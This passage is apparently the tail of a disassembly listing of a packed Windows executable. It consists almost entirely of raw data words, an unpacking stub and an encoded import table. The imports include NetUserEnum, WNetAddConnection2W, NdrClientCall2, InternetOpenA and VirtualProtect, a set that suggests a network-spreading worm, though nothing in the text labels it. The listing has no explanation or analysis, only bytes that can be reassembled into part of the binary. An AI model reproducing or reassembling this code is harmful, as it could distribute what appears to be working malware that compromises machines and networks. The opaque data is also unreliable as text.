dd 0E981D0Fh, 0C4920416h, 0A415CD38h, 0B7081364h, 0CDEB0060h
dd 2AF258Ah, 775A3909h, 30D10172h, 66544198h, 0AE1010FAh
dd 4F714591h, 0DE1C7809h, 2208DB29h, 4861293Ah, 57574146h
dd 68143B72h, 0B461167h, 1C0C536Eh, 4C26CD9h, 8E41103Fh
dd 0D26CD9B6h, 570214E2h, 3D02574Eh, 24145092h, 0C9D7D867h
dd 43411495h, 0FA176CC2h, 5700DB34h, 5F28EA62h, 0D75C9A73h
dd 0BA63E568h, 93F86909h, 4785686Dh, 0E0610AE8h, 0DC64665Fh
dd 9856C30Dh, 41EF1755h, 9BC26E09h, 7525128Bh, 620845B9h
dd 41048B6Dh, 96108D2h, 74336668h, 2847691Eh, 77025267h
dd 6B91DB9Bh, 4C690516h, 0DD736377h, 0BAD0B63Dh, 0AA687060h
dd 70631E66h, 4F279579h, 7268079Eh, 7461706Dh, 0CE62C5FBh
dd 27670A2Fh, 28776CA2h, 362F7BEFh, 29511018h, 604226Eh
dd 6C327F33h, 66AA6E65h, 0CDEC3686h, 1E0E045Ah, 0CE852E59h
dd 61711BDFh, 0F1746573h, 61BD8363h, 6E8D759Dh, 0D9B97334h
dd 0CA606A3h, 6CDE2905h, 6EC680D8h, 0E797C8C7h, 431586C6h
dd 4E5F903Dh, 9A70F111h, 0D8F57185h, 3D8D70BEh, 75166F0Ah
dd 526B6666h, 0A395311h, 6540B13Dh, 0C0F94A02h, 918F6463h
dd 2136D12h, 98AF658Eh, 0F61F6312h, 603B6387h, 876B570Eh
dd 65EAEF61h, 7DB66E9Dh, 40C02h, 0B5C39232h, 85156F19h
dd 8531341Bh, 279F2B25h, 0DB372955h, 0A88D73AEh, 3F8504Ch
dd 80209FFh, 2CB2BAECh, 190F0706h, 0E6031003h, 920FC4C2h
dd 0B8426370h
dd 5162E8B3h, 1CF38B51h, 0C1B16128h, 121D4110h, 74CE8B45h
dd 4E19DF16h, 2287B027h, 32B96415h, 0AD9A6D47h, 246030B0h
dd 6E44FF24h, 40745152h, 31970648h, 1841458Ah, 0D3B566D0h
dd 3030856Ch, 586E1321h, 415E9ACBh, 3482CB0Dh, 276C974h
dd 3A095749h, 0E20293Ch, 68E850ADh, 0B662750Ah, 0C2A0BD9h
dd 64475AAEh, 4469D498h, 33455F9Ch, 64CF3071h, 0B07C1E1h
dd 6CCDAB97h, 676C8FBFh, 83819893h, 0BA6DAC49h, 41459AFBh
dd 0B66ABE8h, 34228C6Dh, 0BC70BC1Dh, 0ACB5CD6h, 131B40E3h
dd 6C492C3Eh, 73660E86h, 0CB153471h, 2D59D586h, 118360A1h
dd 69126593h, 366EBA75h, 0B652D6B5h, 0CB125A74h, 0F1A11A72h
dd 0B05EA760h, 18E8C831h, 4BA69C54h, 35845E46h, 0CF12081Eh
dd 0D9EF5563h, 2FD5B62Ch, 59704048h, 3739212Ah, 7F472E58h
dd 6A08E65h, 1A9684B6h, 25854E2Bh, 263BC040h, 78D965F9h
dd 0DA06A9Ah, 0B2140175h, 159671F1h, 8A167E73h, 0CB2CB234h
dd 4020E36h, 2C0C396Fh, 0BC636CBh, 130203A2h, 2C0D9712h
dd 100AB2CBh, 53231770h, 0AB5B167Fh, 6C991441h, 16ACF047h
dd 0D773041Ch, 4F0EDFDh, 0F0C0309h, 0C041404h, 5C038401h
dd 0FDAD2C04h, 10C580Dh, 9CF00410h, 0B6051E01h, 2496C163h
dd 0D4150D4Ch, 5F540B02h, 0CC5B7B77h, 41DD805h, 14AC1400h
dd 0FF8C182Ch, 2BBFFFFh, 46CF00Eh, 213B0622h, 18161A36h
dd 0F072D13h, 6927151Bh, 0A181F10h, 0FF060B5Dh, 0DFFFFFFh
dd 3D120D08h, 0F2D140Fh, 250E2906h, 2C095A10h, 2D0A0609h
dd 150B0D19h, 90B1320h, 0B72B490Fh, 27EDFFEEh, 0E2D170Bh
dd 36061A21h, 0C0C1D0Ah, 7030C05h, 0FF190B05h, 3AFFFF6Fh
dd 6070A57h, 60C1E20h, 80B120Fh, 36060518h, 16062B05h
dd 151C0A10h, 7F1A0B06h, 15FDDFFBh, 16070828h, 0C24202Dh
dd 0A9230A0Eh, 1C0145F0h, 16234B68h, 0ED0A0F0Ah, 22EDDBFFh
dd 28321E0Eh, 1E260E26h, 15221950h, 0D151221h, 0F61D5724h
dd 39FFFFFFh, 340C8106h, 3A1D350Eh, 8190625h, 7190911h
dd 1612091Eh, 0E2E0C29h, 0A007091Dh, 0FC2FB7FEh, 1920201Bh
dd 7F30B41Fh, 5D1B4B58h, 162B0A21h, 6F096C0Fh, 0DFB7B5BFh
dd 1A0D0CA8h, 0E6A151Eh, 780614h, 301F5208h, 0EDD00094h
dd 0A0806FFh, 35250711h, 80F2010h, 6F2E31B2h, 0B7BB7F6Fh
dd 27101907h, 8083611h, 2FF0A330h, 9331601h, 0FFFFFF35h
dd 472237FFh, 82B193Bh, 57071E13h, 730C1721h, 6C450A0Bh
dd 5A0C2539h, 243D6513h, 8C071048h, 0FFF75F24h, 2E1A19FFh
dd 1D160E36h, 911A1E0Fh, 1D2E190Ch, 13090907h, 913DF05h
dd 0FB7FF62Eh, 2F0814B7h, 17081812h, 10A73C08h, 8373312Dh
dd 6B1C7A28h, 7FF76C2Fh, 1B2FE161h, 0E2B2A30h, 153D4F2Eh
dd 1F301311h, 0FFFF0533h, 42A5EA5h, 12101553h, 9B1D8013h
dd 0D1E3B98h, 1EAA0A14h, 56EE9945h, 0F0D1CF8h, 53282717h
dd 12030E05h, 0D63EE850h, 28020D0Bh, 0F080706h, 0FFFB1711h
dd 361ACDFFh, 7163F1Bh, 38651407h, 1A305E12h, 0A3B4214h
dd 0E1E0805h, 0DBFB4C24h, 0C8E7FB7h, 7182527h, 3F13AB0Ch
dd 7271D3Bh, 0B421D47h, 685FA810h, 30067FFFh, 0E800D2Bh
dd 0F30214Ch, 1E0D3425h, 255D4D02h, 0DBFF300Fh, 452FED85h
dd 2212E608h, 90F2A07h, 0B0B1524h, 0E240A11h, 0FC2FB768h
dd 36151731h, 171A2A05h, 730E1421h, 0C2051409h, 556FB76h
dd 2CCE1FBAh, 0C08C360h, 2FF21B0Dh, 14FFF6FCh, 72A1411h
dd 1C0E1626h, 6943830h, 142D0731h, 1222078Bh, 97FFFFFFh
dd 1E29090Bh, 285B1717h, 11161310h, 3D23295Dh, 440B1D09h
dd 21254334h, 17193835h, 8C685FDAh, 2B265D2Ah, 0A906111Eh
dd 0BF0516B6h, 15E170BDh, 6165205h, 85199427h, 371C4405h
dd 5F142494h, 196FB7F8h, 1A5D0809h, 480E19C5h, 184D0826h
dd 100F1C34h, 0F6FE370Fh, 18216E0Bh, 0E3190D70h, 6340B08h
dd 709200Eh, 1BFE1728h, 281117DBh, 17330212h, 6060D88h
dd 60E01A38h, 51B6DB18h, 61223F8h, 54E2202Bh, 1410ED10h
dd 0DDAD6D1Ah, 73B4EF8h, 19C4231Ah, 2981335h, 5BB5AD80h
dd 169FC6A3h, 6B451D0Ch, 0FB7DBB1Fh, 323305B7h, 0D0B0723h
dd 10174B16h, 0E054A311h, 58240E1Bh, 87E5EEBh, 0B991609h
dd 2D05090Dh, 6D120D11h, 12EDEE6Bh, 71CA498h, 1B051340h
dd 0BF85602Dh, 130EE37Dh, 2107540Ah, 1F890510h, 2061150Dh
dd 0D8D82A26h, 2613D2FEh, 61F0911h, 0A093F17h, 170FD811h
dd 9CDFFDBEh, 4616311Ah, 16370E28h, 0D361267h, 190A1718h
dd 6DAD1214h, 1C264ADCh, 0C971A13h, 3BB7DAFEh, 19E56DBEh
dd 491A3C1Ah, 0F38960Ah, 1E0C551Fh, 6A5FD2FFh, 10298002h
dd 574F053Bh, 3C0A5365h, 62D2306h, 0BBA5C6C6h, 223BE86Eh
dd 6605172Fh, 0E50E1D59h, 0BF0A342h, 37901B0Ch, 0BF070A9Bh
dd 18FFC6F4h, 2F5B1629h, 28085A13h, 0F041AE1Ah, 3C39C75Ah
dd 5B0C3C0Eh, 948D6B63h, 12CD9514h, 0D0130287h, 32DBFDBDh
dd 2C3FBF11h, 260E1305h, 171315A6h, 0DB1C000Eh, 92ADEDBBh
dd 2A9F06DCh, 3AB42FCBh, 18211206h, 2FFDA10Eh, 3145116Dh
dd 11281611h, 1124320Dh, 0BC2BF617h, 0EB5B0AE4h, 0EFFF2D19h
dd 0DE1E1412h, 872E35B0h, 7FE6170Ch, 2922ED1Ah, 0E1768833h
dd 0DF7ED1B7h, 431E0209h, 3E211020h, 0F6FFFFFFh, 7103C1Eh
dd 0B01D0F11h, 0F00174F0h, 50F008B2h, 0F04B0E03h, 0F0DD01D9h
dd 0FF4909D2h, 1FEBBFA6h, 167F7A4Ch, 1064796Eh, 4BF03459h
dd 232052D8h, 0DE3D7A14h, 0F0FFFEB6h, 0F03104A7h, 0D6F00957h
dd 24BF005h, 3289D0F0h, 405D43Ah, 0C827FF8Dh, 72F0E300h
dd 3FF01A01h, 0CE523A02h, 4D68D7F7h, 9305855Bh, 36BA31Ch
dd 46DB1B0Bh, 2219A2Bh, 61205824h, 0EDFF4036h, 0C1FBA5Bh
dd 880A1E0Ah, 7154D32h, 0BF47473Ch, 4556FEE4h, 115A2149h
dd 0E300196Ch, 9361724h, 8DF1BF2Fh, 0AA123E0Bh, 727F090Dh
dd 1E68EF1Eh, 6F0B8033h, 8BFE37FDh, 0A4192210h, 12EC3007h
dd 102F00Dh, 0EA3B2229h, 3719124Dh, 0CFCB85Eh, 7D573F1Fh
dd 347B2C23h, 0F62B2211h, 0C285071Ah, 975E8DADh, 1B649E15h
dd 0ADF59D1Dh, 0CF007A55h, 461915D3h, 0ADFD0913h, 238EB742h
dd 49204F08h, 26272A22h, 0F6FE2723h, 1800ADC8h, 2B0C5815h
dd 0F013342Ch, 0F0550869h, 2DE25F6Fh, 8BF0D1ABh, 0EFF0C5B5h
dd 3651002h, 0F636C641h, 1D1A69C2h, 600F9h, 0BA3902E0h
dd 8DAF6E15h, 61608B1h, 7EC3150Ah, 6F2D2B20h, 500D65Ch
dd 41CF7F0h, 4A886CA8h, 0F2143F08h, 0C0F07B0Ah, 2101B05h
dd 0DD51019Fh, 5018030Ch, 91F10003h, 48E4991Fh, 780E3EAFh
dd 28000001h, 0E47247CCh, 900171CCh, 5A000401h, 4766F510h
dd 1E1401D0h, 1957F90Ah, 1736450h, 0E4014000h, 0B0FE42AFh
dd 0F980001h, 28000010h, 0E4720004h, 177FAA9h, 60EC0178h
dd 2860D440h, 0B5FB12FCh, 2B17D85Ch, 0C040B07Ch, 10183BDDh
dd 0B3130A00h, 0DADB1427h, 428C3494h, 6BCC1329h, 0B7442800h
dd 0C11BCE09h, 85h, 0
dd 0FF24h, 3 dup(0)
dd 8247C80h, 0C2850F01h, 60000001h, 9B2000BEh, 0BE8D00h
dd 57FFFEF0h, 0EBFFCD83h, 9090900Dh, 8846068Ah, 0DB014707h
dd 1E8B0775h, 11FCEE83h, 0B8ED72DBh, 1, 775DB01h, 0EE831E8Bh
dd 11DB11FCh, 73DB01C0h, 8B0975EFh, 0FCEE831Eh, 0E473DB11h
dd 0E883C931h, 0C10D7203h, 68A08E0h, 0FFF08346h, 0C5897474h
dd 775DB01h, 0EE831E8Bh, 11DB11FCh, 75DB01C9h, 831E8B07h
dd 0DB11FCEEh, 2075C911h, 75DB0141h, 831E8B07h, 0DB11FCEEh
dd 0DB01C911h, 975EF73h, 0EE831E8Bh, 73DB11FCh, 2C183E4h
dd 0F300FD81h, 0D183FFFFh, 2F148D01h, 76FCFD83h, 42028A0Fh
dd 49470788h, 63E9F775h, 90FFFFFFh, 0C283028Bh, 83078904h
dd 0E98304C7h, 1F17704h, 0FF4CE9CFh, 895EFFFFh, 486B9F7h
dd 78A0000h, 3CE82C47h, 80F77701h, 0F2750B3Fh, 5F8A078Bh
dd 0E8C16604h, 10C0C108h, 0F829C486h, 1E8EB80h, 830789F0h
dd 0D88805C7h, 0BE8DD9E2h, 1C000h, 0C009078Bh, 5F8B4574h
dd 30848D04h, 1F000h, 8350F301h, 96FF08C7h, 1F140h, 47078A95h
dd 0DC74C008h, 779F989h, 4707B70Fh, 57B94750h, 55AEF248h
dd 0F14496FFh, 0C0090001h, 3890774h, 0EB04C383h, 0C03161D8h
dd 83000CC2h, 5E8D04C7h, 8AC031FCh, 0C0094707h, 0EF3C2274h
dd 0C3011177h, 0C486038Bh, 8610C0C1h, 89F001C4h, 24E2EB03h
dd 10E0C10Fh, 83078B66h, 0E2EB02C7h, 0F148AE8Bh, 0BE8D0001h
dd 0FFFFF000h, 1000BBh, 6A545000h, 0FF575304h, 2F878DD5h
dd 80000002h, 60807F20h, 50587F28h, 57535054h, 6158D5FFh
dd 8024448Dh, 0C439006Ah, 0EC83FA75h, 790AE980h, 0FFFFh
dd 1D2h dup(0)
dd 201C8h, 20140h, 3 dup(0)
dd 201D5h, 20158h, 3 dup(0)
dd 201E2h, 20160h, 3 dup(0)
dd 201EAh, 20168h, 3 dup(0)
dd 201F5h, 20170h, 3 dup(0)
dd 20202h, 20178h, 3 dup(0)
dd 2020Ch, 20180h, 3 dup(0)
dd 20219h, 20188h, 3 dup(0)
dd 20224h, 20190h, 3 dup(0)
dd 20230h, 20198h, 3 dup(0)
dd 2023Ch, 201A0h, 3 dup(0)
dd 20247h, 201A8h, 3 dup(0)
dd 20252h, 201B0h, 3 dup(0)
dd 2025Eh, 201B8h, 3 dup(0)
dd 2026Ah, 201C0h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C801AD0h, 7C809A51h, 7C809AE4h
dd 0
dd 77DD7A80h, 0
dd 71B2578Ch, 0
dd 77C36BD0h, 0
dd 5B894541h, 0
dd 774FEE36h, 0
dd 77124C05h, 0
dd 77EF34D0h, 0
dd 7C9EC6A0h, 0
dd 77F67E3Ch, 0
dd 78161DFDh, 0
dd 7E423DCEh, 0
dd 77C018BAh, 0
dd 7806C865h, 0
dd 71AB3B91h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 504D006Ch, 6C642E52h, 534D006Ch, 54524356h
dd 6C6C642Eh, 54454E00h, 33495041h, 6C642E32h, 6C6F006Ch
dd 2E323365h, 6C6C64h, 41454C4Fh, 32335455h, 6C6C642Eh
dd 43505200h, 2E345452h, 6C6C64h, 4C454853h, 2E32334Ch
dd 6C6C64h, 574C4853h, 2E495041h, 6C6C64h, 6D6C7275h, 642E6E6Fh
dd 55006C6Ch, 33524553h, 6C642E32h, 4556006Ch, 4F495352h
dd 6C642E4Eh, 4957006Ch, 454E494Eh, 6C642E54h, 5357006Ch
dd 32335F32h, 6C6C642Eh, 6F4C0000h, 694C6461h, 72617262h
dd 4179h, 50746547h, 41636F72h, 65726464h, 7373h, 74726956h
dd 506C6175h, 65746F72h, 7463h, 74726956h, 416C6175h, 636F6C6Ch
dd 69560000h, 61757472h, 6572466Ch, 65h, 65657246h, 646953h
dd 4E570000h, 64417465h, 6E6F4364h, 7463656Eh, 326E6F69h
dd 57h, 736261h, 654E0000h, 65735574h, 756E4572h, 6Dh
dd 6E556F43h, 74696E69h, 696C6169h, 657Ah, 4372644Eh, 6E65696Ch
dd 6C614374h, 326Ch, 53727453h, 57497274h, 624F0000h, 6E696174h
dd 72657355h, 6E656741h, 72745374h, 676E69h, 65470000h
dd 676C4474h, 6D657449h, 65560000h, 65755172h, 61567972h
dd 4165756Ch, 6E490000h, 6E726574h, 704F7465h, 416E65h
dd 1F000h, 0Ch, 36FDh, 325h dup(0)
dd 3F7C0A93h
db 0
db 3 dup(?)
dd 508h dup(?)
_text ends
end start